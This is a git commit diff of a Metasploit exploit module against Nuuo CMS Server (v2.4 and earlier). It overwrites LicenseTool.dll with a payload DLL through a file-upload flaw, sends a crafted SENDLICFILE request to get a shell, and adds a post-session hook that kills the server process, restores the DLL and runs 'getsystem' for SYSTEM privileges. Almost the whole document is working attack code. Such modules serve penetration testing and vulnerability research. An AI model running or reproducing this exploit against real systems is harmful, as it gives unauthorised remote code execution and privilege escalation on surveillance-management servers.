Repair CMS installation and use getsystem
Pedro Ribeiro
GitHub
parent
70b9110840
commit
9a068e9221
|
|
@ -4,7 +4,7 @@
|
|||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ManualRanking
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::Remote::Nuuo
|
||||
|
|
@ -19,7 +19,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
characters. Therefore, this function can be abused to overwrite any files in the installation
|
||||
drive of CMS Server.
|
||||
|
||||
Note that this exploit will destroy the CMS installation - it will replace a key DLL!
|
||||
This vulnerability is exploitable in CMS versions up to and including v2.4.
|
||||
|
||||
This module will either use a provided session number (which can be guessed with an auxiliary
|
||||
|
|
@ -49,6 +48,30 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def on_new_session(client)
|
||||
if client.type == "meterpreter"
|
||||
print_warning("#{peer} - Please wait a bit while we clean up")
|
||||
client.sys.process.get_processes().each do |proc|
|
||||
if proc['name'] == "NCS_Server.exe"
|
||||
client.sys.process.kill(proc['pid'])
|
||||
sleep 5
|
||||
client.shell_command_token("move /y #{@dll} LicenseTool.dll")
|
||||
client.sys.process.execute("NCS_Server.exe")
|
||||
print_good("#{peer} - Successfully restored LicenseTool.dll!")
|
||||
end
|
||||
end
|
||||
|
||||
# elevate privs to system (we're already Admin anyway), and we're done!
|
||||
client.run_cmd("getsystem")
|
||||
print_good("#{peer} - We should have SYSTEM now, enjoy your shell!")
|
||||
else
|
||||
print_error("#{peer} - You are not using meterpreter, so we are unable to restore LicenseTool.dll")
|
||||
print_error("#{peer} - To restore it, kill the NCS_Server.exe process and copy <CMS_FOLDER>\\#{@dll} to <CMS_FOLDER>\\LicenseTool.dll")
|
||||
print_error("#{peer} - ... otherwise the Nuuo CMS installation will be nuked!")
|
||||
print_good("#{peer} - Anyway, enjoy your shell!")
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
login
|
||||
|
||||
|
|
@ -56,15 +79,22 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
fail_with(Failure::NoAccess, "#{peer} - Failed to login to Nuuo CMS")
|
||||
end
|
||||
|
||||
# Download and upload a backup of LicenseTool.dll, so that we can restore it at post
|
||||
# and not nuke the CMS installation.
|
||||
@dll = rand_text_alpha(12)
|
||||
print_status("#{peer} - Backing up LicenseTool.dll to #{@dll}")
|
||||
dll_data = download_file("LicenseTool.dll")
|
||||
upload_file(@dll, dll_data)
|
||||
|
||||
print_status("#{peer} - Uploading payload...")
|
||||
upload_file("LicenseTool.dll", generate_payload_dll)
|
||||
|
||||
print_status("#{peer} - Sleeping 15 seconds...")
|
||||
sleep 15
|
||||
|
||||
print_status("#{peer} - Sending SENDLICFILE request, shell incoming!")
|
||||
license_data = rand_text_alpha(50..350)
|
||||
data = send_data_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic",
|
||||
send_data_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic",
|
||||
"Content-Length: " + license_data.length.to_s], license_data)
|
||||
# In order not to destroy the Nuuo CMS installation, we should migrate the process, kill the NCS_Server process and replace the DLL
|
||||
end
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue